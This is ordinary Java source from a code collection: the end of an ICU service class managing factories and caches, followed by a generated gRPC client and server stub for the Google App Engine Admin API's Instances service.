// locale, comparator, and corresponding map. private static class LocaleRef { private final ULocale locale; private SortedMap<String, String> dnCache; private Comparator<Object> com; LocaleRef(SortedMap<String, String> dnCache, ULocale locale, Comparator<Object> com) { this.locale = locale; this.com = com; this.dnCache = dnCache; } SortedMap<String, String> get(ULocale loc, Comparator<Object> comp) { SortedMap<String, String> m = dnCache; if (m != null && this.locale.equals(loc) && (this.com == comp || (this.com != null && this.com.equals(comp)))) { return m; } return null; } } private LocaleRef dnref; /** * Return a snapshot of the currently registered factories. 
There * is no guarantee that the list will still match the current * factory list of the service subsequent to this call. */ public final List<Factory> factories() { try { factoryLock.acquireRead(); return new ArrayList<Factory>(factories); } finally{ factoryLock.releaseRead(); } } /** * A convenience override of registerObject(Object, String, boolean) * that defaults visible to true. */ public Factory registerObject(Object obj, String id) { return registerObject(obj, id, true); } /** * Register an object with the provided id. The id will be * canonicalized. The canonicalized ID will be returned by * getVisibleIDs if visible is true. */ public Factory registerObject(Object obj, String id, boolean visible) { String canonicalID = createKey(id).canonicalID(); return registerFactory(new SimpleFactory(obj, canonicalID, visible)); } /** * Register a Factory. Returns the factory if the service accepts * the factory, otherwise returns null. The default implementation * accepts all factories. */ public final Factory registerFactory(Factory factory) { if (factory == null) { throw new NullPointerException(); } try { factoryLock.acquireWrite(); factories.add(0, factory); clearCaches(); } finally { factoryLock.releaseWrite(); } notifyChanged(); return factory; } /** * Unregister a factory. The first matching registered factory will * be removed from the list. Returns true if a matching factory was * removed. */ public final boolean unregisterFactory(Factory factory) { if (factory == null) { throw new NullPointerException(); } boolean result = false; try { factoryLock.acquireWrite(); if (factories.remove(factory)) { result = true; clearCaches(); } } finally { factoryLock.releaseWrite(); } if (result) { notifyChanged(); } return result; } /** * Reset the service to the default factories. The factory * lock is acquired and then reInitializeFactories is called. 
*/ public final void reset() { try { factoryLock.acquireWrite(); reInitializeFactories(); clearCaches(); } finally { factoryLock.releaseWrite(); } notifyChanged(); } /** * Reinitialize the factory list to its default state. By default * this clears the list. Subclasses can override to provide other * default initialization of the factory list. Subclasses must * not call this method directly, as it must only be called while * holding write access to the factory list. */ protected void reInitializeFactories() { factories.clear(); } /** * Return true if the service is in its default state. The default * implementation returns true if there are no factories registered. */ public boolean isDefault() { return factories.size() == defaultSize; } /** * Set the default size to the current number of registered factories. * Used by subclasses to customize the behavior of isDefault. */ protected void markDefault() { defaultSize = factories.size(); } /** * Create a key from an id. This creates a Key instance. * Subclasses can override to define more useful keys appropriate * to the factories they accept. If id is null, returns null. */ public Key createKey(String id) { return id == null ? null : new Key(id); } /** * Clear caches maintained by this service. Subclasses can * override if they implement additional that need to be cleared * when the service changes. Subclasses should generally not call * this method directly, as it must only be called while * synchronized on this. */ protected void clearCaches() { // we don't synchronize on these because methods that use them // copy before use, and check for changes if they modify the // caches. cache = null; idcache = null; dnref = null; } /** * Clears only the service cache. * This can be called by subclasses when a change affects the service * cache but not the id caches, e.g., when the default locale changes * the resolution of ids changes, but not the visible ids themselves. 
*/ protected void clearServiceCache() { cache = null; } /** * ServiceListener is the listener that ICUService provides by default. * ICUService will notifiy this listener when factories are added to * or removed from the service. Subclasses can provide * different listener interfaces that extend EventListener, and modify * acceptsListener and notifyListener as appropriate. */ public static interface ServiceListener extends EventListener { public void serviceChanged(ICUService service); } /** * Return true if the listener is accepted; by default this * requires a ServiceListener. Subclasses can override to accept * different listeners. */ @Override protected boolean acceptsListener(EventListener l) { return l instanceof ServiceListener; } /** * Notify the listener, which by default is a ServiceListener. * Subclasses can override to use a different listener. */ @Override protected void notifyListener(EventListener l) { ((ServiceListener)l).serviceChanged(this); } /** * When the statistics for this service is already enabled, * return the log and resets he statistics. * When the statistics is not enabled, this method enable * the statistics. Used for debugging purposes. */ public String stats() { ICURWLock.Stats stats = factoryLock.resetStats(); if (stats != null) { return stats.toString(); } return "no stats"; } /** * Return the name of this service. This will be the empty string if none was assigned. */ public String getName() { return name; } /** * Returns the result of super.toString, appending the name in curly braces. */ @Override public String toString() { return super.toString() + "{" + name + "}"; } }
googleapis/google-cloud-java
35,997
java-appengine-admin/grpc-google-cloud-appengine-admin-v1/src/main/java/com/google/appengine/v1/InstancesGrpc.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.appengine.v1; import static io.grpc.MethodDescriptor.generateFullMethodName; /** * * * <pre> * Manages instances of a version. * </pre> */ @javax.annotation.Generated( value = "by gRPC proto compiler", comments = "Source: google/appengine/v1/appengine.proto") @io.grpc.stub.annotations.GrpcGenerated public final class InstancesGrpc { private InstancesGrpc() {} public static final java.lang.String SERVICE_NAME = "google.appengine.v1.Instances"; // Static method descriptors that strictly reflect the proto. 
private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> getListInstancesMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "ListInstances", requestType = com.google.appengine.v1.ListInstancesRequest.class, responseType = com.google.appengine.v1.ListInstancesResponse.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> getListInstancesMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> getListInstancesMethod; if ((getListInstancesMethod = InstancesGrpc.getListInstancesMethod) == null) { synchronized (InstancesGrpc.class) { if ((getListInstancesMethod = InstancesGrpc.getListInstancesMethod) == null) { InstancesGrpc.getListInstancesMethod = getListInstancesMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "ListInstances")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.ListInstancesRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.ListInstancesResponse.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("ListInstances")) .build(); } } } return getListInstancesMethod; } private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> getGetInstanceMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "GetInstance", requestType = com.google.appengine.v1.GetInstanceRequest.class, 
responseType = com.google.appengine.v1.Instance.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> getGetInstanceMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> getGetInstanceMethod; if ((getGetInstanceMethod = InstancesGrpc.getGetInstanceMethod) == null) { synchronized (InstancesGrpc.class) { if ((getGetInstanceMethod = InstancesGrpc.getGetInstanceMethod) == null) { InstancesGrpc.getGetInstanceMethod = getGetInstanceMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "GetInstance")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.GetInstanceRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.Instance.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("GetInstance")) .build(); } } } return getGetInstanceMethod; } private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> getDeleteInstanceMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "DeleteInstance", requestType = com.google.appengine.v1.DeleteInstanceRequest.class, responseType = com.google.longrunning.Operation.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> getDeleteInstanceMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> getDeleteInstanceMethod; if 
((getDeleteInstanceMethod = InstancesGrpc.getDeleteInstanceMethod) == null) { synchronized (InstancesGrpc.class) { if ((getDeleteInstanceMethod = InstancesGrpc.getDeleteInstanceMethod) == null) { InstancesGrpc.getDeleteInstanceMethod = getDeleteInstanceMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation> newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "DeleteInstance")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.DeleteInstanceRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.longrunning.Operation.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("DeleteInstance")) .build(); } } } return getDeleteInstanceMethod; } private static volatile io.grpc.MethodDescriptor< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> getDebugInstanceMethod; @io.grpc.stub.annotations.RpcMethod( fullMethodName = SERVICE_NAME + '/' + "DebugInstance", requestType = com.google.appengine.v1.DebugInstanceRequest.class, responseType = com.google.longrunning.Operation.class, methodType = io.grpc.MethodDescriptor.MethodType.UNARY) public static io.grpc.MethodDescriptor< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> getDebugInstanceMethod() { io.grpc.MethodDescriptor< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> getDebugInstanceMethod; if ((getDebugInstanceMethod = InstancesGrpc.getDebugInstanceMethod) == null) { synchronized (InstancesGrpc.class) { if ((getDebugInstanceMethod = InstancesGrpc.getDebugInstanceMethod) == null) { InstancesGrpc.getDebugInstanceMethod = getDebugInstanceMethod = io.grpc.MethodDescriptor .<com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation> 
newBuilder() .setType(io.grpc.MethodDescriptor.MethodType.UNARY) .setFullMethodName(generateFullMethodName(SERVICE_NAME, "DebugInstance")) .setSampledToLocalTracing(true) .setRequestMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.appengine.v1.DebugInstanceRequest.getDefaultInstance())) .setResponseMarshaller( io.grpc.protobuf.ProtoUtils.marshaller( com.google.longrunning.Operation.getDefaultInstance())) .setSchemaDescriptor(new InstancesMethodDescriptorSupplier("DebugInstance")) .build(); } } } return getDebugInstanceMethod; } /** Creates a new async stub that supports all call types for the service */ public static InstancesStub newStub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesStub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesStub>() { @java.lang.Override public InstancesStub newStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesStub(channel, callOptions); } }; return InstancesStub.newStub(factory, channel); } /** Creates a new blocking-style stub that supports all types of calls on the service */ public static InstancesBlockingV2Stub newBlockingV2Stub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingV2Stub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingV2Stub>() { @java.lang.Override public InstancesBlockingV2Stub newStub( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingV2Stub(channel, callOptions); } }; return InstancesBlockingV2Stub.newStub(factory, channel); } /** * Creates a new blocking-style stub that supports unary and streaming output calls on the service */ public static InstancesBlockingStub newBlockingStub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingStub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesBlockingStub>() { @java.lang.Override public InstancesBlockingStub newStub( io.grpc.Channel channel, 
io.grpc.CallOptions callOptions) { return new InstancesBlockingStub(channel, callOptions); } }; return InstancesBlockingStub.newStub(factory, channel); } /** Creates a new ListenableFuture-style stub that supports unary calls on the service */ public static InstancesFutureStub newFutureStub(io.grpc.Channel channel) { io.grpc.stub.AbstractStub.StubFactory<InstancesFutureStub> factory = new io.grpc.stub.AbstractStub.StubFactory<InstancesFutureStub>() { @java.lang.Override public InstancesFutureStub newStub( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesFutureStub(channel, callOptions); } }; return InstancesFutureStub.newStub(factory, channel); } /** * * * <pre> * Manages instances of a version. * </pre> */ public interface AsyncService { /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ default void listInstances( com.google.appengine.v1.ListInstancesRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.ListInstancesResponse> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getListInstancesMethod(), responseObserver); } /** * * * <pre> * Gets instance information. * </pre> */ default void getInstance( com.google.appengine.v1.GetInstanceRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.Instance> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getGetInstanceMethod(), responseObserver); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. 
For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ default void deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getDeleteInstanceMethod(), responseObserver); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ default void debugInstance( com.google.appengine.v1.DebugInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ServerCalls.asyncUnimplementedUnaryCall( getDebugInstanceMethod(), responseObserver); } } /** * Base class for the server implementation of the service Instances. * * <pre> * Manages instances of a version. 
* </pre> */ public abstract static class InstancesImplBase implements io.grpc.BindableService, AsyncService { @java.lang.Override public final io.grpc.ServerServiceDefinition bindService() { return InstancesGrpc.bindService(this); } } /** * A stub to allow clients to do asynchronous rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesStub extends io.grpc.stub.AbstractAsyncStub<InstancesStub> { private InstancesStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesStub build(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesStub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public void listInstances( com.google.appengine.v1.ListInstancesRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.ListInstancesResponse> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getListInstancesMethod(), getCallOptions()), request, responseObserver); } /** * * * <pre> * Gets instance information. * </pre> */ public void getInstance( com.google.appengine.v1.GetInstanceRequest request, io.grpc.stub.StreamObserver<com.google.appengine.v1.Instance> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getGetInstanceMethod(), getCallOptions()), request, responseObserver); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. 
For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public void deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getDeleteInstanceMethod(), getCallOptions()), request, responseObserver); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ public void debugInstance( com.google.appengine.v1.DebugInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getDebugInstanceMethod(), getCallOptions()), request, responseObserver); } } /** * A stub to allow clients to do synchronous rpc calls to service Instances. * * <pre> * Manages instances of a version. 
* </pre> */ public static final class InstancesBlockingV2Stub extends io.grpc.stub.AbstractBlockingStub<InstancesBlockingV2Stub> { private InstancesBlockingV2Stub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesBlockingV2Stub build( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingV2Stub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public com.google.appengine.v1.ListInstancesResponse listInstances( com.google.appengine.v1.ListInstancesRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getListInstancesMethod(), getCallOptions(), request); } /** * * * <pre> * Gets instance information. * </pre> */ public com.google.appengine.v1.Instance getInstance( com.google.appengine.v1.GetInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getGetInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. 
* </pre> */ public com.google.longrunning.Operation deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDeleteInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ public com.google.longrunning.Operation debugInstance( com.google.appengine.v1.DebugInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDebugInstanceMethod(), getCallOptions(), request); } } /** * A stub to allow clients to do limited synchronous rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesBlockingStub extends io.grpc.stub.AbstractBlockingStub<InstancesBlockingStub> { private InstancesBlockingStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesBlockingStub build( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingStub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). 
* </pre> */ public com.google.appengine.v1.ListInstancesResponse listInstances( com.google.appengine.v1.ListInstancesRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getListInstancesMethod(), getCallOptions(), request); } /** * * * <pre> * Gets instance information. * </pre> */ public com.google.appengine.v1.Instance getInstance( com.google.appengine.v1.GetInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getGetInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public com.google.longrunning.Operation deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDeleteInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. 
* </pre> */ public com.google.longrunning.Operation debugInstance( com.google.appengine.v1.DebugInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDebugInstanceMethod(), getCallOptions(), request); } } /** * A stub to allow clients to do ListenableFuture-style rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesFutureStub extends io.grpc.stub.AbstractFutureStub<InstancesFutureStub> { private InstancesFutureStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesFutureStub build(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesFutureStub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public com.google.common.util.concurrent.ListenableFuture< com.google.appengine.v1.ListInstancesResponse> listInstances(com.google.appengine.v1.ListInstancesRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getListInstancesMethod(), getCallOptions()), request); } /** * * * <pre> * Gets instance information. * </pre> */ public com.google.common.util.concurrent.ListenableFuture<com.google.appengine.v1.Instance> getInstance(com.google.appengine.v1.GetInstanceRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getGetInstanceMethod(), getCallOptions()), request); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. 
For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public com.google.common.util.concurrent.ListenableFuture<com.google.longrunning.Operation> deleteInstance(com.google.appengine.v1.DeleteInstanceRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getDeleteInstanceMethod(), getCallOptions()), request); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. 
* </pre> */ public com.google.common.util.concurrent.ListenableFuture<com.google.longrunning.Operation> debugInstance(com.google.appengine.v1.DebugInstanceRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getDebugInstanceMethod(), getCallOptions()), request); } } private static final int METHODID_LIST_INSTANCES = 0; private static final int METHODID_GET_INSTANCE = 1; private static final int METHODID_DELETE_INSTANCE = 2; private static final int METHODID_DEBUG_INSTANCE = 3; private static final class MethodHandlers<Req, Resp> implements io.grpc.stub.ServerCalls.UnaryMethod<Req, Resp>, io.grpc.stub.ServerCalls.ServerStreamingMethod<Req, Resp>, io.grpc.stub.ServerCalls.ClientStreamingMethod<Req, Resp>, io.grpc.stub.ServerCalls.BidiStreamingMethod<Req, Resp> { private final AsyncService serviceImpl; private final int methodId; MethodHandlers(AsyncService serviceImpl, int methodId) { this.serviceImpl = serviceImpl; this.methodId = methodId; } @java.lang.Override @java.lang.SuppressWarnings("unchecked") public void invoke(Req request, io.grpc.stub.StreamObserver<Resp> responseObserver) { switch (methodId) { case METHODID_LIST_INSTANCES: serviceImpl.listInstances( (com.google.appengine.v1.ListInstancesRequest) request, (io.grpc.stub.StreamObserver<com.google.appengine.v1.ListInstancesResponse>) responseObserver); break; case METHODID_GET_INSTANCE: serviceImpl.getInstance( (com.google.appengine.v1.GetInstanceRequest) request, (io.grpc.stub.StreamObserver<com.google.appengine.v1.Instance>) responseObserver); break; case METHODID_DELETE_INSTANCE: serviceImpl.deleteInstance( (com.google.appengine.v1.DeleteInstanceRequest) request, (io.grpc.stub.StreamObserver<com.google.longrunning.Operation>) responseObserver); break; case METHODID_DEBUG_INSTANCE: serviceImpl.debugInstance( (com.google.appengine.v1.DebugInstanceRequest) request, (io.grpc.stub.StreamObserver<com.google.longrunning.Operation>) responseObserver); break; default: throw new 
AssertionError(); } } @java.lang.Override @java.lang.SuppressWarnings("unchecked") public io.grpc.stub.StreamObserver<Req> invoke( io.grpc.stub.StreamObserver<Resp> responseObserver) { switch (methodId) { default: throw new AssertionError(); } } } public static final io.grpc.ServerServiceDefinition bindService(AsyncService service) { return io.grpc.ServerServiceDefinition.builder(getServiceDescriptor()) .addMethod( getListInstancesMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse>( service, METHODID_LIST_INSTANCES))) .addMethod( getGetInstanceMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance>( service, METHODID_GET_INSTANCE))) .addMethod( getDeleteInstanceMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation>(service, METHODID_DELETE_INSTANCE))) .addMethod( getDebugInstanceMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation>( service, METHODID_DEBUG_INSTANCE))) .build(); } private abstract static class InstancesBaseDescriptorSupplier implements io.grpc.protobuf.ProtoFileDescriptorSupplier, io.grpc.protobuf.ProtoServiceDescriptorSupplier { InstancesBaseDescriptorSupplier() {} @java.lang.Override public com.google.protobuf.Descriptors.FileDescriptor getFileDescriptor() { return com.google.appengine.v1.AppengineProto.getDescriptor(); } @java.lang.Override public com.google.protobuf.Descriptors.ServiceDescriptor getServiceDescriptor() { return getFileDescriptor().findServiceByName("Instances"); } } private static final class InstancesFileDescriptorSupplier extends InstancesBaseDescriptorSupplier { InstancesFileDescriptorSupplier() {} } private static final class 
InstancesMethodDescriptorSupplier extends InstancesBaseDescriptorSupplier implements io.grpc.protobuf.ProtoMethodDescriptorSupplier { private final java.lang.String methodName; InstancesMethodDescriptorSupplier(java.lang.String methodName) { this.methodName = methodName; } @java.lang.Override public com.google.protobuf.Descriptors.MethodDescriptor getMethodDescriptor() { return getServiceDescriptor().findMethodByName(methodName); } } private static volatile io.grpc.ServiceDescriptor serviceDescriptor; public static io.grpc.ServiceDescriptor getServiceDescriptor() { io.grpc.ServiceDescriptor result = serviceDescriptor; if (result == null) { synchronized (InstancesGrpc.class) { result = serviceDescriptor; if (result == null) { serviceDescriptor = result = io.grpc.ServiceDescriptor.newBuilder(SERVICE_NAME) .setSchemaDescriptor(new InstancesFileDescriptorSupplier()) .addMethod(getListInstancesMethod()) .addMethod(getGetInstanceMethod()) .addMethod(getDeleteInstanceMethod()) .addMethod(getDebugInstanceMethod()) .build(); } } } return result; } }
apache/solr
35,878
solr/core/src/java/org/apache/solr/servlet/SolrRequestParsers.java
